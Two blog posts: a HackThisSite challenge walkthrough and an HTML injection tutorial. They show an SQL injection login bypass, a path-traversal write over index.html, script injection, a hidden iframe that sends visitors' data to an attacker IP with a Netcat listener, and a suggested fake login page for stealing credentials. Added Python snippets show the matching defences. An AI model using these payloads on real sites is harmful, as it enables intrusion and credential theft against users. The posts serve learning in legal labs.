Sunday, January 12, 2020

Hack This Site | Info, Walkthrough, and Review

HackThisSite.org, commonly referred to as HTS, is an online hacking and security site founded by Jeremy Hammond. The site has been maintained by members of the community since his departure.
It aims to give users a way to learn and practice basic and advanced "hacking" skills through a series of challenges in a safe and legal environment.

In short, you can demonstrate and learn basic to advanced hacking skills from Hack This Site.

So without wasting time, we are going to dive into HackThisSite.org.

The first thing you need to do is register on the site. It's simple and easy.


A few features of HTS:

1) Provides real-time hacking scenarios.
2) Many articles and feeds on recent technologies, programming languages, exploits and tutorials.
3) An excellent forum with topics ranging from basic to the most sophisticated stuff you'll find on the web. Some of the topics are cryptography, mathematics, design, human psychology and far more.
4) A great collection of warez that can be used for private and hosted challenges.
5) HackThisSite IRC, where you'll meet some of the most talented people on the web.
6) Last but not least: basic challenges, realistic challenges, JavaScript challenges and all the others, which are the base of HTS and have kept it interesting since 2005.

The list of challenges we have here:

Hackthissite Challenges

Here we are going to solve some challenges for better understanding and fun.

Hack This Site Basic mission 1

In this simple challenge, our HTML skills are going to be useful. Just inspect the page and find the login form; you can see the password there.

Hack This Site Basic Challenge 1

As you can see, the password is saved in the HTML. Easy, right?
But after every challenge the difficulty level increases and the challenges become harder to complete.

Moving on to the next challenge.


Hack This Site Basic mission 2

This challenge really requires some thinking and common sense.

No password file has been uploaded to check whether the password is right or not, so any password you enter will give you an incorrect password.

But the catch is that if we submit a blank password, the script does not check it and confirms it directly.
Just submit a blank field and it will show congrats, you completed the challenge.



Hack this Site Basic mission 3

This time the password file is present; we just need to find it. To do that, we need to inspect the site and find that password file.

Hackthissite basic mission 3

After searching for some time, I found the file password.php in there.

We just need to open that file by adding it to the URL.

Hackthissite basic mission 3 password.php

As you can see, after hitting enter the password is shown directly. Just copy it, paste it in the password field and hit submit, and we have passed another challenge.

Hack this site basic mission 4

This time our developer Sam made a script to send him the password via email.
We need to find his email address first; to do so, inspect the page and find the email address in the HTML tags.

Hack this site basic challenge 4

After inspecting the HTML, I found the email address of Sam, which is sam@hackthissite.org.

We just need to replace this email address with our own so that the script will send the password to our email address.

Now click on the script named "send the password to sam" and this page will appear:

Hack this site basic challenge 4

The password will be sent to the email address we changed it to. Simply open that email, copy the password, paste it in the password field and hit submit, and we have passed another challenge.

These are some of the basic challenges I wanted to show you; there are more to play with. Try to solve those challenges on your own; a smile will spread across your face after every challenge you pass.
Go ahead and take the challenges.


Realistic Challenges


Now we are going to see some realistic challenges, which are really fun to solve and test your hacking skills.
There are lots of challenges out there, but I will show you my 2 favorite challenges.
Without wasting time, let's get into it.

Hack this site realistic mission 2

First of all, don't get offended by this challenge; it's just a demo site, and nothing here represents the USA or Iran.

Our goal here is to take down this site.

First, we need to inspect the site to find any useful information to escalate further.
After inspecting it, I found one juicy file, which is update.php.

Hack this site realistic mission 2 page

By adding update.php to the URL, I found a very interesting page there.

Yes, we found a login page, but in order to gain access we need to find the username and password, right?

We can hack this login page with an old-school manual SQL injection attack.

To check for an SQL error, we need to find the right payload.

After some trial and error, I found that the login page gives an error on some POST-based union queries like

1=1--

Hack this site realistic mission 2 login page

After playing with it, I got the payload   ' or 1=1--   which worked perfectly, and we got admin access.

Hence we completed the challenge.
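
The bypass above works because the login query is assembled from user input. The following is an added example, not the mission's code and not from the original post, that puts a concatenated query beside a parameterized one; the table layout, function names and sample password are assumptions constructed for the illustration.

```python
import hashlib
import hmac
import sqlite3

def _digest(password: str) -> str:
    # Unsalted SHA-256 only keeps this example short; a real login table
    # should store a salted password-hashing KDF such as scrypt or Argon2.
    return hashlib.sha256(password.encode()).hexdigest()

def make_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the login page's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("admin", _digest("constructed-password")))
    return db

def login_concatenated(db, username: str, password: str) -> bool:
    """'Before': input is pasted into the SQL text, so a quote rewrites the query."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND pw_hash = '" + _digest(password) + "'")
    return db.execute(sql).fetchone() is not None

def login_parameterized(db, username: str, password: str) -> bool:
    """'After': the placeholder binds input as data; it is never parsed as SQL."""
    row = db.execute(
        "SELECT pw_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    # Compare outside SQL, in constant time, and fail closed for unknown users.
    return row is not None and hmac.compare_digest(row[0], _digest(password))

def compare(username: str, password: str) -> dict:
    """Run one credential pair through both versions for a side-by-side result."""
    db = make_db()
    return {"concatenated": login_concatenated(db, username, password),
            "parameterized": login_parameterized(db, username, password)}

if __name__ == "__main__":
    # The second username is the payload quoted in the walkthrough above.
    for user, pw in [("admin", "constructed-password"), ("' or 1=1--", "x")]:
        print(repr(user), compare(user, pw))
```
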


Hack This Site Realistic mission 3

In this realistic challenge, we need to recover a poem site which has been defaced by some bad hackers.

After opening the defaced site, we need to inspect it.

Hack This Site Realistic mission 3 Hacked page

After inspecting that hacked page, I found the green HTML text over there,
which suggests the old site is still up there and backed up at oldindex.html.
So we need to find it first.
To do that, type oldindex.html at the end of the URL and hit enter.

Hack This Site Realistic mission 3 oldindex.html

Here we can see that the poem site is still running in the background.
Now we need to post this page to index.html by submitting this page's source code.
But the catch here is that we must use our previous path traversal knowledge to place the file in the correct directory,
which means we need to submit it one directory up for it to show correctly as the index page.
To do that, first copy the source code of the poem site and click on submit a poem.

Hack This Site Realistic mission 3

Here, as the name of the poem, we need to add the path, which is  ../index.html
Then paste the source code in the poem box and add the poem.
After this the poem will be written to index.html, which is the home page, and the defaced page gets removed automatically.

Hence challenge completed = respect+
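
The mission works because the poem name is used as a file path without any check. The following is an added example, not the mission's code and not from the original post, of a submission handler that keeps every poem inside its own directory; the directory layout, the title rules and all function names are assumptions made for the illustration.

```python
import re
import tempfile
from pathlib import Path

# Allowlist for poem titles: letters, digits, space, underscore, hyphen.
TITLE_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9 _-]{0,63}")

def poem_path(poems_dir: Path, title: str) -> Path:
    """Map a submitted title to a file that is guaranteed to sit inside poems_dir."""
    if not TITLE_RE.fullmatch(title):
        raise ValueError("title contains characters not allowed in a poem name")
    base = poems_dir.resolve()
    # Fixed .txt suffix: a submission can never become a served .html page.
    target = (base / f"{title}.txt").resolve()
    # Defence in depth: even if the allowlist changes, refuse anything that
    # resolves (through '..' or a symlink) to a location outside the directory.
    if base not in target.parents:
        raise ValueError("resolved path escapes the poems directory")
    return target

def save_poem(poems_dir: Path, title: str, body: str) -> Path:
    path = poem_path(poems_dir, title)
    path.write_text(body, encoding="utf-8")
    return path

def demo() -> dict:
    """Build a throwaway site tree and submit constructed titles to it."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        site = Path(root)
        index = site / "index.html"
        index.write_text("home page", encoding="utf-8")
        poems = site / "poems"
        poems.mkdir()
        for title in ["Autumn Rain", "../index.html", "/etc/passwd"]:
            try:
                save_poem(poems, title, "<html>submitted text</html>")
                results[title] = "saved"
            except ValueError:
                results[title] = "rejected"
        results["index_intact"] = index.read_text(encoding="utf-8") == "home page"
    return results

if __name__ == "__main__":
    print(demo())
```
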


I had too much fun solving the realistic challenges. A must try.

Sunday, January 5, 2020

HTML Injection tutorial


In order to know what HTML injection is, we first need to know what HTML is.

HTML is HyperText Markup Language. It is mostly used for creating websites. Web pages and content are sent to a browser as HTML documents. Those HTML documents are then converted into normal websites and displayed to the end users.

In this tutorial, we will learn how HTML injection works in practice.

What is HTML Injection?

The essence of this type of injection attack is injecting HTML code into a search field or any other vulnerable part of the site. The malicious user sends HTML code through any vulnerable field, such as the URL, in order to change the website's design or any information that is displayed to the user.
We are going to see the types of HTML injection and how each is done.

Types of HTML Injections

  • Reflected HTML Injection
  • Stored HTML Injection

Reflected HTML Injection

A reflected injection attack can be performed according to the HTTP method used, that is, the GET method or the POST method. As we know from how these requests work,
with POST, data gets sent;
with GET, data gets requested.
By checking the source code we can find which method is used by that website.

Reflected HTML Injection (GET)

Reflected GET injection occurs when our input is displayed (reflected) on the website. If we enter HTML code on a vulnerable website, it is displayed on that website at that instant, and the HTML code is also injected into that website's HTML document.

As you can see in the image below:

Reflected GET injection

As we typed the HTML tag <h1>html injection</h1> into the login form, it is reflected in the site, which means this site is vulnerable to HTML injection.

To find out whether a site is vulnerable or not, we just need any HTML tag to display in it.


Reflected HTML Injection (POST)

Reflected POST injection occurs when an attacker sends malicious HTML code instead of valid POST request parameters.

It is more difficult to escalate than GET because the POST request is sent by the site to the server; that's why we sometimes need Tamper Data (a Firefox add-on) to craft and send the POST request to the server.

Reflected POST Injection

In the image above, the simple HTML code <h1>Hacking Castle</h1> is displayed on the page, but it is sent to the server by the POST method because it's not the defined parameter.
We will see how to use Tamper Data in the next type.



Reflected HTML Injection (URL)

Reflected URL HTML injection occurs when HTML code sent by an attacker through the website URL is displayed on the website and simultaneously injected into the website's HTML document.

This time we will use Tamper Data to craft the URL and send it to the server; this URL will be shown to other people visiting the same page.

To do that, open Tamper Data, change the URL from there and send the requests until they reach the server, then stop it.

Editing URL in Tamper Data

Reflected URL

As you can see in the image above, the link URL has changed to the request we crafted using Tamper Data.
This will be stored in the page for other users too, so we can escalate to many malicious things to get user info,
which we are going to see in the next type of HTML injection.



Stored HTML Injection

A stored injection attack occurs when malicious HTML code is saved on the web server and will execute whenever a victim tries to use that function.

This page contains a submit form which stores the user's input and lists it below, but if the input is not handled as a parameter, an HTML tag in it will be injected and the page is vulnerable to HTML injection.

We are going to use the HTML tag

     <h1>Hacking Castle</h1>

to see whether it's vulnerable or not.

Vulnerable to stored HTML Injection

As we can see, this HTML tag is stored in the page.

Let's see another example; this time we will use <script>alert("Hacking Castle");</script>
This JavaScript code will show an alert popup on the page.

Popup

In the image above we can see it popped up on the page, and it's also stored in the form, which means whenever someone opens that page or refreshes it, this will pop up there.

That's the difference between reflected and stored HTML injection.

So that is stored HTML injection. Now we are going to see how this can be escalated further to steal user information.


Stealing user Information using HTML Injection

Here we are going to use an iframe tag and a Netcat listener to get useful information.
First, we will use this iframe tag:

<iframe src="http://(IP:port)/test" height="0" width="0"></iframe>

Before hitting submit, open a Netcat session in a terminal and type the command

nc -nvlp (port)

It will open the listener. Then hit submit, and we will get the user credentials of anyone who opens that page.

Getting user credentials using HTML Injection
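
Every reflected and stored case in this tutorial depends on the page writing user input into its HTML unencoded. The following is an added example, not code from the original post or from the tested site, that renders the tutorial's three tags with and without output encoding and then parses the result to show which elements a browser would actually create; the entry list, the collector.example host, the function names and the header values are constructed assumptions.

```python
import html
from html.parser import HTMLParser

# Constructed sample entries: plain text plus the tags submitted in this tutorial.
ENTRIES = [
    "nice post",
    "<h1>Hacking Castle</h1>",
    '<script>alert("Hacking Castle");</script>',
    '<iframe src="http://collector.example/test" height="0" width="0"></iframe>',
]

class TagCollector(HTMLParser):
    """Records every element an HTML parser creates from the page."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def live_tags(page: str) -> list:
    collector = TagCollector()
    collector.feed(page)
    collector.close()
    return collector.tags

def render_unsafe(entries) -> str:
    """'Before': stored input is concatenated straight into the page."""
    return "<ul>" + "".join(f"<li>{e}</li>" for e in entries) + "</ul>"

def render_escaped(entries) -> str:
    """'After': input is HTML-encoded at output time, so it is shown as text."""
    items = "".join(f"<li>{html.escape(e, quote=True)}</li>" for e in entries)
    return "<ul>" + items + "</ul>"

# Response headers that limit the damage if an encoding step is ever missed
# (header names are standard; the policy values are an assumed starting point).
SECURITY_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; frame-src 'none'",
    "X-Content-Type-Options": "nosniff",
}

if __name__ == "__main__":
    print("unsafe :", live_tags(render_unsafe(ENTRIES)))
    print("escaped:", live_tags(render_escaped(ENTRIES)))
```
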


More ideas to play with


  • HTML is a very good language to play with. We can make an HTML login page with a Netcat listener to get users' login credentials.

  • There is a whole lot of HTML code that can deface the site if it's vulnerable.

These things I leave up to you guys to play with and have fun.

This cheat sheet will help you with that:

Cheat sheet


Conclusion


There is noticeably less literature and information about HTML injection. As a result, testers may choose not to perform this kind of testing. In that case, however, the risks of HTML attacks may not be assessed sufficiently.

As we have analyzed in this tutorial, with this type of injection the entire design of your site may be destroyed, or even users' login data may be stolen. Therefore, it is strongly recommended to include HTML injection in security testing and to invest in good knowledge.


That's all about HTML injection.


Happy Hacking

